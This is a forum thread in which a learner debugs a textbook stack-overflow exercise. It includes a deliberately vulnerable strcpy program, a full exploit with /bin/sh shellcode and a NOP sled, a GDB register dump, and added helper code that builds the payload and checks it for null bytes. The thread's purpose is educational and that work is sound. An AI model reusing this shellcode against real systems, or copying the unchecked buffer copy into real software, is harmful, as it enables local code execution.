
Thread: DEP in BT3? exploit

  1. #1
    Junior Member
    Join Date
    May 2007
    Posts
    82

    Default DEP in BT3? exploit

    I'm practicing coding an exploit from a book I'm currently working through (Hacking: The Art of Exploitation).

    Now there's a program in the book that's vulnerable to a stack overflow. The other program is the exploit that takes advantage of the program by shuffling data into the buffer with the bytecode. Now the problem is I can understand some parts of the program. But when I compile both the vulnerable program and the exploit, it doesn't seem to want to spit out a shell. Now I've written a vulnerable program and tried to overwrite the EIP, and I've looked at GDB; now I cannot seem to overwrite the register. Now I know there are programs that do additional checks on the EIP, and processors now are armed with DEP, even though I've disabled it in the BIOS, and still I cannot overwrite the EIP. I've updated the BT3 kernel to 2.6.24 and I'm not too sure if the latest kernel does do additional checks on the EIP.

    All I want to know is: is there a way to know whether anything like DEP has been enabled on my system?

    Thanks people

  2. #2
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    Can you provide us with the source of your vulnerable program/exploit/shellcode so we may see if there's simply a coding/scripting error?



    "The goal of every man should be to continue living even after he can no longer draw breath."

    ~ShadowKill

  3. #3
    Junior Member
    Join Date
    May 2007
    Posts
    82

    Default

    Yeah, sure.

    the program....

    #include <stdio.h>
    #include <string.h>

    int main(int argc, char *argv[])
    {
        char buffer[5];          /* deliberately too small: no length check on argv[1] */
        strcpy(buffer, argv[1]);
        return 0;
    }


    the exploit....

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    char shellcode[] =
    "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
    "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
    "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
    "\x68";

    unsigned long sp(void)                 // This is just a little function
    { __asm__("movl %esp, %eax"); }        // used to return the stack pointer (result left in eax)

    int main(int argc, char *argv[])
    {
        int i, offset;
        long esp, ret, *addr_ptr;
        char *buffer, *ptr;

        offset = 0;              // Use an offset of 0
        esp = sp();              // Put the current stack pointer into esp
        ret = esp - offset;      // We want to overwrite the ret address

        printf("Stack pointer (ESP) : 0x%lx\n", esp);
        printf("  Offset from ESP   : 0x%x\n", offset);
        printf("Desired Return Addr : 0x%lx\n", ret);

        // Allocate 600 bytes for buffer (on the heap)
        buffer = malloc(600);

        // Fill the entire buffer with the desired ret address
        ptr = buffer;
        addr_ptr = (long *) ptr;
        for (i = 0; i < 600; i += 4)
        { *(addr_ptr++) = ret; }

        // Fill the first 200 bytes of the buffer with NOP instructions
        for (i = 0; i < 200; i++)
        { buffer[i] = '\x90'; }

        // Put the shellcode after the NOP sled
        ptr = buffer + 200;
        for (i = 0; i < strlen(shellcode); i++)
        { *(ptr++) = shellcode[i]; }

        // End the string
        buffer[600-1] = 0;

        // Now call the program ./vuln with our crafted buffer as its argument
        execl("./vuln", "vuln", buffer, (char *) NULL);

        // Free the buffer memory (only reached if execl fails)
        free(buffer);

        return 0;
    }

    I've compiled them both, and when I try to run the exploit all I get is a segmentation violation, which is understandable. When I put the program in GDB and send loads of 'A's, this is what I get.

    (gdb) info registers
    eax 0x0 0
    ecx 0x41414141 1094795585
    edx 0xbfa2e532 -1079843534
    ebx 0xb7f5fff4 -1208614924
    esp 0x4141413d 0x4141413d
    ebp 0x41414141 0x41414141
    esi 0xb7f95ce0 -1208394528
    edi 0x0 0
    eip 0x8048389 0x8048389 <main+53> <not overwritten even after 100+ 'A's>
    eflags 0x210286 [ PF SF IF RF ID ]
    cs 0x73 115
    ss 0x7b 123
    ds 0x7b 123
    es 0x7b 123
    fs 0x0 0
    gs 0x33 51

    What I was talking about, DEP or something else being enabled, is 'wrong' :-p. Because I managed to make a program that, instead of taking in an argument, copies a buffer into another buffer that's in a function; I can understand how I can overwrite the return address, and I'm copying a buffer into another buffer using a function in which the EIP is overwritten.

    It's just that program above, which I got from that book, that I cannot seem to get working.

    Thanks for your help.

    I hope I've provided enough information to solve the problem.

  4. #4
    Senior Member ShadowKill's Avatar
    Join Date
    Dec 2007
    Posts
    908

    Default

    Okay, I'll take a better look at this in a minute, but first: are you sure that your shellcode contains no 'null' characters (0)? Because if so, that will register as a stop and exit the program...

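
The null-byte question in post #4 can be checked mechanically rather than by eye. The code below is an added example, not code from the thread or the book: it builds the same layout the posted exploit uses (return address in every 4-byte slot, 200-byte NOP sled, shellcode after the sled, NUL terminator last) into a caller-supplied array and then measures how much of it the target's `strcpy(buffer, argv[1])` would actually copy. Because execl() hands the buffer over as a C string, any 0x00 byte, whether inside the shellcode or inside the return address itself, truncates everything after it, so the check has to cover the address as well as the shellcode. The shellcode bytes are the ones posted above; the two addresses are constructed, one shaped like the 0xbfa2e532 stack value from the GDB dump and one with a low byte of 0x00.

```c
/* Added example (not from the thread): build the book-style payload and
 * verify that it survives being passed as a C string argument. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

/* Shellcode exactly as posted in the thread (46 bytes, execve("/bin/sh")). */
static const unsigned char shellcode[] =
    "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
    "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
    "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
    "\x68";
#define SHELLCODE_LEN (sizeof(shellcode) - 1)

/* Lay out 'len' bytes the way the posted exploit does: the 32-bit return
 * address in every 4-byte slot, NOPs over the first nop_len bytes, the
 * shellcode right after the sled, and a NUL in the last byte.
 * Returns 0 on success, -1 if the pieces do not fit. */
int build_payload(unsigned char *buf, size_t len, unsigned long ret,
                  size_t nop_len, const unsigned char *sc, size_t sc_len)
{
    uint32_t r = (uint32_t)ret;           /* little-endian, as on x86 */
    size_t i;
    if (len < 8 || nop_len + sc_len >= len - 4) return -1;
    for (i = 0; i + 4 <= len; i += 4)
        memcpy(buf + i, &r, 4);
    memset(buf, 0x90, nop_len);
    memcpy(buf + nop_len, sc, sc_len);
    buf[len - 1] = 0;
    return 0;
}

/* Offset of the first NUL in buf[0..len-1], i.e. what strlen() in the target
 * sees and how many bytes strcpy() copies. A payload that arrives intact
 * returns len - 1 (only the terminator is NUL). */
size_t payload_visible_length(const unsigned char *buf, size_t len)
{
    size_t i;
    for (i = 0; i < len; i++)
        if (buf[i] == 0) return i;
    return len;
}

/* 1 if none of the four little-endian bytes of the address is 0x00. */
int addr_is_nul_free(unsigned long ret)
{
    int k;
    for (k = 0; k < 4; k++)
        if (((ret >> (8 * k)) & 0xff) == 0) return 0;
    return 1;
}

int main(void)
{
    unsigned char buf[600];
    /* Constructed addresses: the first is shaped like the stack value in the
     * GDB dump from post #3, the second has a zero low byte. */
    unsigned long addrs[2] = { 0xbfa2e532UL, 0xbfa2e500UL };
    int n;

    printf("shellcode: %zu bytes, first NUL at %zu (clean if equal)\n",
           SHELLCODE_LEN, payload_visible_length(shellcode, SHELLCODE_LEN));
    for (n = 0; n < 2; n++) {
        build_payload(buf, sizeof buf, addrs[n], 200, shellcode, SHELLCODE_LEN);
        printf("ret 0x%08lx: nul-free=%d, target would copy %zu of %zu bytes\n",
               addrs[n], addr_is_nul_free(addrs[n]),
               payload_visible_length(buf, sizeof buf), sizeof buf - 1);
    }
    return 0;
}
```

With the 0x00-terminated address the target copies only 248 bytes: the sled and shellcode arrive, but the first untouched address slot after the shellcode ends the string, so the saved return address is never reached. That is the failure mode ShadowKill is describing, and it is independent of whether DEP is on.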

  5. #5
    Junior Member
    Join Date
    May 2007
    Posts
    82

    Default

    Nah, it doesn't contain NULL characters. I'm just wondering why it doesn't work, as NOP (0x90) code is being fed into the buffer with the return address and the shellcode, but even still the shellcode doesn't want to execute, even though the exploit is using the NOP method to execute the shellcode. I'm going to have a look at it more. I shall get back to you if I find a way to get the shellcode to work. Thanks for your help though!!!!
